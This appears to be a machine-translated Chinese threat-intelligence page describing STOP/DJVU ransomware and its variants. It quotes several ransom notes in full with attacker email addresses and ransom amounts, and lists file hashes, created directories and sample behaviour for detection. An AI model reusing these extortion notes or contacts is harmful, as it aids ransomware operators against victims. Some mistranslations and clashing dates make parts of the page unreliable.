STOP勒索软件
威胁评分卡
EnigmaSoft 威胁记分卡
EnigmaSoft 威胁记分卡是针对不同恶意软件威胁的评估报告,由我们的研究团队收集和分析。 EnigmaSoft 威胁记分卡使用多个指标对威胁进行评估和排名,包括现实世界和潜在风险因素、趋势、频率、普遍性和持续性。 EnigmaSoft 威胁记分卡会根据我们的研究数据和指标定期更新,对广泛的计算机用户有用,从寻求解决方案以从系统中删除恶意软件的最终用户到分析威胁的安全专家。
EnigmaSoft 威胁记分卡显示各种有用的信息,包括:
流行度排名: EnigmaSoft威胁数据库中特定威胁的排名。
严重性级别:根据我们的风险建模过程和研究,确定的对象的严重性级别,以数字形式表示,如我们的威胁评估标准中所述。
受感染计算机: SpyHunter 报告的在受感染计算机上检测到的特定威胁的确认和疑似案例数量。
另请参阅威胁评估标准。
| 人气排名: | 5,066 |
| 威胁级别: | 100 % (高的) |
| 受感染的计算机: | 363,586 |
| 初见: | November 29, 2018 |
| 最后一次露面: | September 25, 2026 |
| 受影响的操作系统: | Windows |
PC安全研究人员于2018年2月21日收到有关涉及勒索软件STOP勒索软件的威胁的勒索软件攻击的报告。STOP Ransomware基于开源勒索软件平台,并执行加密勒索软件攻击的典型版本。 STOP勒索软件是使用包含损坏的文件附件的垃圾邮件来分发的。这些文件附件采用带有嵌入式宏脚本的DOCX文件的形式,这些脚本将STOP Ransomware下载并安装到受害者的计算机上。学习如何识别网络钓鱼电子邮件并避免下载收到的任何未经请求的文件附件是避免这些攻击的方法之一。
目录
如何识别STOP勒索软件感染
一旦将STOP Ransomware安装到受害者的计算机上,STOP Ransomware就会在受害者的驱动器中搜索各种文件类型,通常会寻找用户生成的文件,例如图像,媒体文件和许多其他文档类型。 STOP Ransomware似乎也针对目标Web服务器而设计,因为它查找通常包含在这些计算机中的数据库文件和类似文件类型。 STOP勒索软件将搜索并针对其攻击的文件类型包括:
.3dm,.3g2,.3gp,.7zip,.aaf,.accdb,.aep,.aepx,.aet,.ai,.aif,.as,.as3,.asf,.asp,.asx,.avi ,.bmp,.c,.class,.cpp,.cs,.csv,.dat,.db,.dbf,.doc,.docb,.docm,.docx,.dot,.dotm,.dotx 、. dwg,.dxf,.efx,.eps,.fla,.flv,.gif,.h,.idml,.iff,.indb,.indd,.indl,.indt,.inx,.jar,.java, .jpeg,.jpg,.js,.m3u,.m3u8,.m4u,.max,.mdb,.mid,.mkv,.mov,.mp3,.mp4,.mpa,.mpeg,.mpg,.msg ,.pdb,.pdf,.php,.plb,.pmd,.png,.pot,.potm,.potx,.ppam,.ppj,.pps,.ppsm,.ppsx,.ppt,.pptm 、. pptx,.prel,.prproj,.ps,.psd,.py,.ra,.rar,.raw,.rb,.rtf,.sdf,.sdf,.ses,.sldm,.sldx,.sql, .svg,.swf,.tif,.txt,.vcf,.vob,.wav,.wma,.wmv,.wpd,.wps,.xla,.xlam,.xll,.xlm,.xls,.xlsb ,.xlsm,.xlsx,.xlt,.xltm,.xltx,.xlw,.xml,.xqx,.xqx,.zip。
STOP勒索软件使用一种强大的加密算法来使每个受害者的文件都无法访问。 STOP Ransomware攻击将在其加密的文件中添加文件扩展名“ .SUSPENDED”,以标记受影响的文件。
STOP勒索软件的勒索笔记
STOP勒索软件通过向受害者的计算机提供赎金通知书要求赎金。该赎金记录以文本文件的形式显示在受害者桌面上。该文件名为'!!! YourDataRestore !!!。txt”,包含以下消息:
'您的所有重要文件均在此PC上加密。
所有扩展名为.STOP的文件均已加密. 加密是使用为此计算机生成的唯一私钥RSA-1024生成的。
要解密文件,您需要获取私钥+解密软件。
要检索私钥和解密软件,您需要通过电子邮件与我们联系stopfilesrestore@bitmessage.ch向我们发送电子邮件,您的!!! YourDataRestore !!!。txt文件,并等待进一步的说明。
为确保您可以解密我们的文件,您可以向我们发送1-3加密程度不高的文件,并以原始格式免费将其退还给我们。
如果您在72个小时内与我们联系,解密价格为600美元。
您的个人编号:
[随机字符]
与我们联系的电子邮件地址:
stopfilesrestoret@bitmessage.ch
保留电子邮件地址与我们联系:
stopfilesrestore@india.com'
STOP勒索软件的负责人要求在72小时内使用比特币向特定的比特币钱包地址支付600美元的赎金。但是,联系这些人或支付STOP Ransomware赎金可能不是最佳解决方案。
保护数据免受STOP勒索软件和其他勒索软件木马的侵害
防范STOP勒索软件和其他勒索软件木马的最佳保护是拥有文件备份。拥有文件备份副本的计算机用户可以在遭受攻击后轻松恢复这些文件,而不必诉诸赎金。推荐的安全程序还可以防止首先安装STOP勒索软件。
更新2018年12月6日—'helpshadow@india.com'勒索软件
“ helpshadow@india.com”勒索软件被归类为带有STOP Ransomware品牌的代码的较小更新。威胁作者似乎没有足够的时间来完善新变种,因为它的感染率很低。视音频供应商迅速使用了“ helpshadow@india.com”勒索软件,并且已经通过主要的社交平台和网络安全报告发布了警报。不幸的是,还没有免费解密的可能性。用户通常会通过电子邮件收到的损坏的文档而受到损害。已知该威胁会删除Windows创建的Shadow Volume快照,并将“ .shadow”扩展名附加到加密对象上。例如,“ C12-H22-O11.pptx”重命名为“ C12-H22-O11.pptx.shadow”,并且在桌面上出现了名为“!readme.txt”的赎金字样。 “ helpshadow@india.com”勒索软件可能会向受感染的用户显示以下消息:
'您的所有文件都已加密
不用担心,您可以返回所有文件!
您所有的文件文档,照片,数据库和其他重要文件均使用最强的加密和唯一密钥进行加密。
恢复文件的唯一方法是为您购买解密工具和唯一密钥。
该软件将解密您所有的加密文件。
我们为您提供什么保证?
您可以从PC发送加密文件之一,而我们将免费对其进行解密。
但是我们只能免费解密1个文件。文件中不得包含有价值的信息
不要尝试使用第三方解密工具,因为它会破坏您的文件。
如果您在72小时内与我们联系,可享受50%的折扣。
要获得此软件,您需要在我们的电子邮件中写信:
helpshadow@india.com
保留电子邮件地址与我们联系:
helpshadow@firemail.cc
您的个人ID:
[随机字符]
上面显示的文本供早于“ helpshadow@india.com”勒索软件发布的变体使用,唯一值得注意的变化是新的电子邮件配置. “ helpshadow@india.com”勒索软件以其中一个电子邮件联系人的名字命名,另一个以用户名相同但在不同电子邮件平台上的用户身份命名为“ helpshadow@firemail.cc”。在您收到本文时,这两个电子邮件帐户都可能被终止。考虑到勒索软件运营商使用代理,VPN服务和TOR网络来隐藏他们的控制设备,捕获在helpshadow@india.com勒索软件背后的人的机会并不大。因此,用户需要主动保护自己的数据。第一个步骤-在系统上安装备份程序;第二步-不要打开未知发件人的文件。请记住,将数据备份导出到可移动内存存储或文件托管服务。
更新2018年12月13日—“ .djvu文件扩展名”勒索软件
'.djvu文件扩展名'勒索软件是STOP Ransomware的新变体,已于2018年12月12日发布。计算机安全研究人员将'.djvu文件扩展名'勒索软件归类为STOP Ransomware和之前版本的一个小更新。警告该威胁仍主要通过垃圾邮件来分发。威胁参与者一直在使用启用宏的文档和伪造的PDF来诱骗用户静默安装程序。使用“ .djvu文件扩展名”勒索软件进行的攻击与2018年2月的第一波感染几乎相同。该威胁会删除Shadow Volume快照和连接到内存驱动器的映射,然后再加密用户数据。新的变体支持不同的文件扩展名,赎金记录略有更改。顾名思义,文件带有“ .djvu”后缀,并且类似“ Jonne-Kaiho.mp3”的名称被重命名为“ Jonne-Kaiho.mp3.djvu”。赎金记录可以在桌面上显示为“ _openme.txt”,并显示为:
'您的所有文件都已加密
不用担心,您可以返回所有文件!
您所有的文件文档,照片,数据库和其他重要文件均使用最强的加密和唯一密钥进行加密。
恢复文件的唯一方法是为您购买解密工具和唯一密钥。
该软件将解密您所有的加密文件。
我们为您提供什么保证?
您可以从PC发送加密文件之一,而我们将免费对其进行解密。
但是我们只能免费解密1个文件。文件中不得包含有价值的信息
不要尝试使用第三方解密工具,因为它会破坏您的文件。
如果您在72小时内与我们联系,可享受50%的折扣。
要获得此软件,您需要在我们的电子邮件中写信:
helpshadow@india.com
保留电子邮件地址与我们联系:
helpshadow@firemail.cc
您的个人ID:
[随机字符]
威胁作者继续使用“ helpshadow@india.com”和“ helpshadow@firemail.cc”电子邮件帐户进行勒索软件活动。不要相信STOP Ransomware团队,请避免使用上述虚假的50%折扣。这里讨论的威胁参与者并不宽大处理。 PC用户应使用可信任的反恶意软件工具删除“ .djvu文件扩展名”勒索软件。最好使用备份映像和备份服务来恢复数据。
2019年1月11日更新—“ .tfude文件扩展名”勒索软件
'.tfude File Extension'勒索软件是STOP勒索软件的版本,它于2019年1月11日发布。该威胁被归类为与原始网络威胁相比具有最少修改的版本。 “ .tfude文件扩展名”勒索软件是以其损坏的代码中唯一值得注意的更改命名的. 该木马配置为将'.tfude'文件扩展名附加到加密数据。 “ .tfude文件扩展名”勒索软件继续使用标准加密技术和与Command服务器的安全连接,从而阻止安全专家为受到感染的用户提供免费解密。
当前的加密威胁使用了政府机构和Google Inc.等公司用来保护数据传输安全的加密技术。加密的文件在Windows资源管理器中显示为通用的白色图标,并且用户安装的程序仍然可以运行。但是,由于威胁会编码流行的数据库格式,因此某些数据库管理器可能无法正常工作。例如,“最近的sales.pdb”被重命名为“最近的sales.pdb.tfude”。勒索便笺从文件“ _openme.txt”加载到记事本中,该文件可以在桌面上找到。 “ .tfude File Extension”勒索软件提供与原始木马相同的消息,但这次威胁行动者正在使用“ pdfhelp@firemail.cc”电子邮件帐户与用户联系。用户没有免费的解密器,您将需要使用数据备份进行恢复。您将需要使用信誉良好的反恶意软件仪器运行完整的系统扫描,以清理受感染的设备。
2019年1月23日更新—'pausa@bitmessage.ch'勒索软件
“ pausa@bitmessage.ch”勒索软件是由STOP勒索软件生成器生成的文件编码器恶意软件。 “ pausa@bitmessage.ch”勒索软件已于2018年5月的第一周通过垃圾邮件发布给PC用户。快照阻碍恢复。众所周知,“ pausa@bitmessage.ch”勒索软件使用与其他成功的勒索软件(例如Cerber和Dharma)相同的加密技术。 “ pausa@bitmessage.ch”勒索软件经过编程,可从AppData目录下的Temp文件夹运行,并将安全的AES-256密码应用于文档,视频,音乐,数据库和电子书。编码后的数据以“ .PAUSA”为扩展名,“ Hartmann-Save me.mp3”之类的名称被重命名为“ Hartmann-Save me.mp3.pausa”。勒索通知将另存为“ !! RESTORE !!!。txt”到用户桌面,并显示为:
'您的所有重要文件均在此PC上加密。
所有扩展名为.PAUSA的文件都是加密的。
加密是使用为此计算机生成的唯一私钥RSA-1024生成的。
要解密文件,您需要获取私钥+解密软件。
要检索私钥和解密软件,您需要通过电子邮件与我们联系pausa@bitmessage.ch向我们发送您的!!! RESTORE !!!。txt文件,并等待进一步的说明。
为了确保您可以解密我们的文件-您可以向我们发送1-3个不是很大的加密文件,我们将以原始格式免费将其退还给您。
如果您在72个小时内与我们联系,解密价格为600美元。
您的个人编号:
[随机字符]
与我们联系的电子邮件地址:
pausa@bitmessage.ch
保留电子邮件地址与我们联系:
pausa@india.com'
我们建议您避免通过“ pausa@bitmessage.ch”和“ pausa@india.com”电子邮件帐户与威胁参与者进行谈判。借助著名的反恶意软件工具,引导数据备份和清理系统更加安全。即使您支付了600美元的荒唐赎金,也无法保证您将获得解密器。鼓励PC用户每月至少进行两次数据备份,并忽略可能导致安全性受损的垃圾邮件。. 视音频公司支持“ pausa@bitmessage.ch”勒索软件的检测规则,但是在编写本文时,没有免费的解密器可用。
2019年1月23日更新—'waiting@bitmessage.ch'勒索软件
“ waiting@bitmessage.ch”勒索软件是一种基于STOP勒索软件的加密木马。受感染的用户在2018年4月18日报告了``waiting@bitmessage.ch''勒索软件,它似乎已通过损坏的Microsoft Word文档入侵了计算机。记录了“ waiting@bitmessage.ch”勒索软件,以对受感染计算机上的照片,音频,视频和文本进行加密。不幸的是,恶意软件作者添加了一个命令,以删除Windows为保护您的数据而创建的卷快照。该特洛伊木马使用带有'.WAITING'扩展名且无法使用系统上的软件打开的文件覆盖目标数据。例如,将“ Hartmann-Like a River.mp3”重命名为“ Hartmann-River River.mp3.waiting”,然后将勒索消息放到桌面上。 “ waiting@bitmessage.ch”勒索软件将“ !!! INFO_RESTORE !!!。txt”写入桌面,并显示以下文本:
'您的所有重要文件均在此PC上加密。
所有扩展名为.WAITING的文件都是加密的。
加密是使用为此计算机生成的唯一私钥RSA-1024生成的。
要解密文件,您需要获取私钥+解密软件。
要检索私钥和解密软件,您需要通过电子邮件waiting@bitmessage.ch与我们联系。向我们发送您的!!! INFO_RESTORE !!!。txt文件,并等待进一步的说明。
为了确保您可以解密我们的文件-您可以向我们发送1-3个不是很大的加密文件,我们将以原始格式免费将其退还给您。
如果您在72个小时内与我们联系,解密价格为600美元。
您的个人编号:
[随机字符]
与我们联系的电子邮件地址:
等待@ bitmessage.ch
保留电子邮件地址与我们联系:
等待@ india.com'
该恶意软件不会干扰第三方备份工具,因此您应该能够启动数据备份。建议避免通过“ waiting@bitmessage.ch”和“ waiting@india.com”电子邮件地址与威胁参与者进行互动。如果您希望保护数据备份免受网络传输的网络威胁和大多数Ransomware变种(如“ waiting@bitmessage.ch” Ransomware)的侵害,则可能对探索文件托管服务感兴趣。
在2019年及以后停止勒索软件
在2019年晚些时候,STOP勒索软件仍在使用中,并且正在测试新的攻击媒介。 STOP勒索软件开始出现在包含其他形式恶意软件(主要是广告软件)的捆绑软件中,您可以在声称托管有游戏和软件的破解可执行文件的网站上找到这些捆绑软件。这样,许多勒索软件的新受害者被证明是充满希望的软件盗版者,他们寻找的是讨价还价者。
也有证据表明,STOP勒索软件正在安装密码窃取木马,这些木马能够抓取各种登录凭据。
勒索软件还扩展了它使用的加密文件扩展名的长长列表。通过STOP勒索软件加密的文件现在具有.rumba和.tro扩展名。到目前为止,几乎没有什么变化-赎金记录仍在名为“ _openme.txt”的文件中找到,但赎金总额增加到980美元,如果受害人在感染后的前72小时内付款,则赎金减少到490美元。
SpyHunter 检测并删除 STOP勒索软件
STOP勒索软件 截图
文件系统详情
| # | 文件名 | MD5 |
检测
检测数: SpyHunter 报告的在受感染计算机上检测到的特定威胁的确认和疑似案例数量。
|
|---|---|---|---|
| 1. | BB30.exe | f8ef98bbaff6ac82dacde20ee90bfa55 | 4,207 |
| 2. | 5F1F.exe | b5b59a34192343da2c0fc84fb3bb6b2e | 3,154 |
| 3. | 3ffa.exe | a0192bd5d8164e61819890e908fa0e7d | 1,890 |
| 4. | 97DE.tmp.exe | 4e8f1415dd3366f81fa3960db4cf70f9 | 1,772 |
| 5. | 1368.tmp.exe | 8cebee5086592386fa86f3ee5bacc0d2 | 1,647 |
| 6. | 9686685955.exe | 5c71f8c3bb000d163fc2e63c089b35a1 | 1,631 |
| 7. | a395.tmp.exe | 536f955ae69e666b44aac54c7619b9b1 | 1,589 |
| 8. | 3823.TMP.EXE.WPT | d4fceee0f4fe0f1b50a5c957eab5151b | 1,500 |
| 9. | 512B.tmp.exe | 89b1b4f3f6ec190865abaa7f61046ee5 | 1,255 |
| 10. | 3344.exe | 6a4d9e0ad2a5361dd947537182f5692d | 1,240 |
| 11. | d5e2.tmp.exe | 4c1b9a14dda6a74b7abff708758d98f6 | 1,038 |
| 12. | B117.tmp.exe | 283bf952e656763a94626cac01d7bc85 | 979 |
| 13. | 25b9.tmp.exe | 9bd737b220a4040dbcaf17f48be54a98 | 825 |
| 14. | 3A93.tmp.exe | d5995275a4d96672ed08cc6188143a7a | 773 |
| 15. | 2c6b.tmp.exe | ac2dffb783aed99d77ecc2006a29d971 | 744 |
| 16. | 618.tmp.exe | 99ba307185c56cfb6d9ea965fcfef083 | 719 |
| 17. | 160f.tmp.exe | 3a1a3c4b4b3de474b574f48198d6e41e | 647 |
| 18. | 1df7.tmp.exe | ad5a82caee53510fafcdfcddfa74daae | 54 |
| 19. | 5cd3.tmp.exe | 1569c3b648b4c63ae39ddc2d2d91b7d5 | 14 |
| 20. | e5cb.tmp.exe | 031ff93d3e55a84f475cf0b563fe7f65 | 14 |
| 21. | 5dcc.tmp.exe | e3b973420daf30a4180f60337a2eaf90 | 14 |
| 22. | 6fa4.tmp.exe | 67e8f528b4db3443a74718443a2fc788 | 12 |
| 23. | cc0.tmp.exe | 0564489cff6c549ca82b7a470b305346 | 11 |
| 24. | c11d.tmp.exe | a0eb1e740d92c51576ed117d8b6de3c5 | 11 |
| 25. | ransomware.exe | fdc340769c3ca364f6cc7ca1be99762b | 0 |
注册表详情
目录
STOP勒索软件 可能会创建以下目录或目录:
| %ALLUSERSPROFILE%\tzjajmmqgl |
| %PROGRAMFILES%\3DMarkproed |
| %PROGRAMFILES%\3DMarkproediot |
| %PROGRAMFILES%\3DMarkproedit |
| %PROGRAMFILES%\3Dmarkproa |
| %PROGRAMFILES%\Blubnerg |
| %PROGRAMFILES%\Cry\Cryp |
| %PROGRAMFILES%\Davai |
| %PROGRAMFILES%\Glary\Utilities\Settings |
| %PROGRAMFILES%\Hyps |
| %PROGRAMFILES%\Innovativ\ddd |
| %PROGRAMFILES%\Ivp\bin |
| %PROGRAMFILES%\Laertseer |
| %PROGRAMFILES%\Lawer\Xor |
| %PROGRAMFILES%\Marg\Cr |
| %PROGRAMFILES%\Mup\Cr |
| %PROGRAMFILES%\Opute |
| %PROGRAMFILES%\Rondom |
| %PROGRAMFILES%\Sir\Air |
| %PROGRAMFILES%\Tryhd |
| %PROGRAMFILES%\cedfs |
| %PROGRAMFILES%\chrum\xon\note |
| %PROGRAMFILES%\company\3dmarkssdf |
| %PROGRAMFILES%\company\64Product |
| %PROGRAMFILES%\crights\file\xml |
| %PROGRAMFILES%\cryptoss |
| %PROGRAMFILES%\crys\cry |
| %PROGRAMFILES%\crysp\cryq |
| %PROGRAMFILES%\der\supr |
| %PROGRAMFILES%\dera\kii |
| %PROGRAMFILES%\ferr\seda\sx\bin |
| %PROGRAMFILES%\hop |
| %PROGRAMFILES%\inner\win\bin |
| %PROGRAMFILES%\krontal |
| %PROGRAMFILES%\laert |
| %PROGRAMFILES%\laerts |
| %PROGRAMFILES%\lass\inst |
| %PROGRAMFILES%\lastpass\bur\tronfiles |
| %PROGRAMFILES%\lawop |
| %PROGRAMFILES%\lawops |
| %PROGRAMFILES%\margin\marg |
| %PROGRAMFILES%\opur |
| %PROGRAMFILES%\sccsd |
| %PROGRAMFILES%\sir\xd |
| %PROGRAMFILES%\virtka |
| %PROGRAMFILES%\xery |
| %PROGRAMFILES%\youtubedown |
| %PROGRAMFILES(x86)%\3DMarkproed |
| %PROGRAMFILES(x86)%\3DMarkproediot |
| %PROGRAMFILES(x86)%\3DMarkproedit |
| %PROGRAMFILES(x86)%\3Dmarkproa |
| %PROGRAMFILES(x86)%\Blubnerg |
| %PROGRAMFILES(x86)%\Cry\Cryp |
| %PROGRAMFILES(x86)%\Davai |
| %PROGRAMFILES(x86)%\Hyps |
| %PROGRAMFILES(x86)%\Innovativ\ddd |
| %PROGRAMFILES(x86)%\Laertseer |
| %PROGRAMFILES(x86)%\Lawer\Xor |
| %PROGRAMFILES(x86)%\Marg\Cr |
| %PROGRAMFILES(x86)%\Mup\Cr |
| %PROGRAMFILES(x86)%\Opute |
| %PROGRAMFILES(x86)%\Rondom |
| %PROGRAMFILES(x86)%\Sir\Air |
| %PROGRAMFILES(x86)%\Tryhd |
| %PROGRAMFILES(x86)%\cedfs |
| %PROGRAMFILES(x86)%\chrum\xon\note |
| %PROGRAMFILES(x86)%\company\3dmarkssdf |
| %PROGRAMFILES(x86)%\company\64Product |
| %PROGRAMFILES(x86)%\crights\file\xml |
| %PROGRAMFILES(x86)%\cryptoss |
| %PROGRAMFILES(x86)%\crys\cry |
| %PROGRAMFILES(x86)%\crysp\cryq |
| %PROGRAMFILES(x86)%\der\supr |
| %PROGRAMFILES(x86)%\dera\kii |
| %PROGRAMFILES(x86)%\ferr\seda\sx\bin |
| %PROGRAMFILES(x86)%\hop |
| %PROGRAMFILES(x86)%\inner\win\bin |
| %PROGRAMFILES(x86)%\krontal |
| %PROGRAMFILES(x86)%\laert |
| %PROGRAMFILES(x86)%\laerts |
| %PROGRAMFILES(x86)%\lass\inst |
| %PROGRAMFILES(x86)%\lastpass\bur\tronfiles |
| %PROGRAMFILES(x86)%\lawop |
| %PROGRAMFILES(x86)%\lawops |
| %PROGRAMFILES(x86)%\margin\marg |
| %PROGRAMFILES(x86)%\opur |
| %PROGRAMFILES(x86)%\sccsd |
| %PROGRAMFILES(x86)%\sir\xd |
| %PROGRAMFILES(x86)%\virtka |
| %PROGRAMFILES(x86)%\xery |
| %PROGRAMFILES(x86)%\youtubedown |
| %ProgramFiles%\kiss\me |
| %ProgramFiles%\mroz\new\trunk |
| %ProgramFiles(x86)%\kiss\me |
| %ProgramFiles(x86)%\mroz\new\trunk |
分析报告
一般信息
| 姓: | STOP/DJVU Ransomware |
|---|---|
| 签名状态: | No Signature |
已知样本
已知样本
本节列出了其他据信与该家族有关的文件样本。|
MD5:
def8a7bfe5fe47d95a95085d8dbc7a53
SHA1:
7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256:
B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
文件大小:
6.29 MB,6292105字节
|
|
MD5:
a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1:
91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256:
4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
文件大小:
3.47 MB,3471869字节
|
|
MD5:
2336c9624d9a44c393d354206226f508
SHA1:
ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256:
CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
文件大小:
1.36 MB,1359918字节
|
|
MD5:
42f32aa699bc45a3638ddeb325ebebc1
SHA1:
508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256:
16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
文件大小:
1.33 MB,1328186字节
|
|
MD5:
2391d41548b6432191f73edefa273928
SHA1:
620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256:
4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
文件大小:
3.36 MB,3357556字节
|
显示更多
|
MD5:
710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1:
326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256:
051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
文件大小:
1.36 MB,1364106字节
|
|
MD5:
601b120a6f39f72847b2f581a3d5f158
SHA1:
0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256:
BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
文件大小:
4.86 MB,4858569字节
|
|
MD5:
a7b76a49f289081961f8f3824f0b62ca
SHA1:
6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256:
1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
文件大小:
1.41 MB,1406899字节
|
|
MD5:
9f37930d62a1e08f68aa0a72472e7a55
SHA1:
27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256:
29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
文件大小:
600.12 KB,600124字节
|
|
MD5:
7a18839fe61e9cde0e8fea3100acfb2b
SHA1:
9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256:
0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
文件大小:
316.83 KB,316832字节
|
|
MD5:
fe17d0f940a226e80cc18b4399da4ffc
SHA1:
cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256:
D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
文件大小:
1.36 MB,1363661字节
|
|
MD5:
ed83bea5600457af815495b10f235b87
SHA1:
14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256:
FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
文件大小:
9.59 MB,9590154字节
|
|
MD5:
8cc4ef6bfd98074474e53cefc0029d0a
SHA1:
7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9
SHA256:
72BE2A65C8E36058A40FB1EF582E944721F5D041044F454509242E00E6745198
文件大小:
1.41 MB,1407173字节
|
|
MD5:
75e7ec1010908f6cf964ee32c9d57fed
SHA1:
7cccec52318eadb6771ceef6404e19fc46ec8d07
SHA256:
A309D56010D51F07741773ABCC44C767EF99C1031DEFA575F07D11DD11F09E35
文件大小:
2.44 MB,2442353字节
|
Windows 可移植可执行文件属性
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have security information
- File has exports table
- File has TLS information
- File is 32-bit executable
- File is 64-bit executable
- File is either console or GUI application
显示更多
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
文件图标
文件图标
本部分展示了在恶意软件家族样本中找到的图标资源。恶意软件通常会复制与合法软件相关的图标,以误导用户,使其误以为该恶意软件是安全的。Windows PE 版本信息
Windows PE 版本信息
本节显示此系列样本的 Windows 文件版本信息数据结构中已设置的值和属性。为了误导用户,恶意软件攻击者通常会添加伪造的版本信息,模仿合法软件。| 姓名 | 价值 |
|---|---|
| Assembly Version | 1.4.1.0 |
| Comments | This installation was built with Inno Setup. |
| Company Name |
|
| File Description |
|
| File Version |
显示更多
|
| Internal Name |
|
| Legal Copyright |
|
| Original Filename |
|
| Product Name |
显示更多
|
| Product Version |
显示更多
|
数字签名
数字签名
本节列出了该系列样本所附带的数字签名。在分析和验证数字签名时,务必确认签名的根授权机构是知名且可信的实体,并且签名状态良好。恶意软件通常使用不可信的“自签名”数字签名(恶意软件作者可以轻松创建此类签名,无需任何验证)。恶意软件也可能使用状态无效的合法签名,或者使用来自可疑根授权机构且签名者名称虚假或具有误导性的签名。| 签名者 | 根 | 地位 |
|---|---|---|
| win.rar GmbH | DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | Self Signed |
| win.rar GmbH | GlobalSign CodeSigning CA - SHA256 - G3 | Hash Mismatch |
文件特征
- .NET
- 2+ executable sections
- big overlay
- fptable
- HighEntropy
- Inno
- InnoSetup Installer
- Installer Manifest
- Installer Version
- MZ (In Overlay)
显示更多
- No Version Info
- Nullsoft Installer
- RAR (In Overlay)
- RARinO
- Run
- SusSec
- vb6
- WinRAR SFX
- WRARSFX
- x64
- x86
文件已修改
文件已修改
本节列出了该系列样本创建、修改、移动和/或删除的文件。文件系统活动可以帮助我们深入了解恶意软件在操作系统上的运行方式。| 文件 | 属性 |
|---|---|
| \device\namedpipe | Generic Read,Write Attributes |
| \device\namedpipe | Generic Write,Read Attributes |
| \device\namedpipe\gmdasllogger | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-bfiig.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-dlucn.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp | Generic Write,Read Attributes |
显示更多
| c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe | Generic Write,Read Attributes |
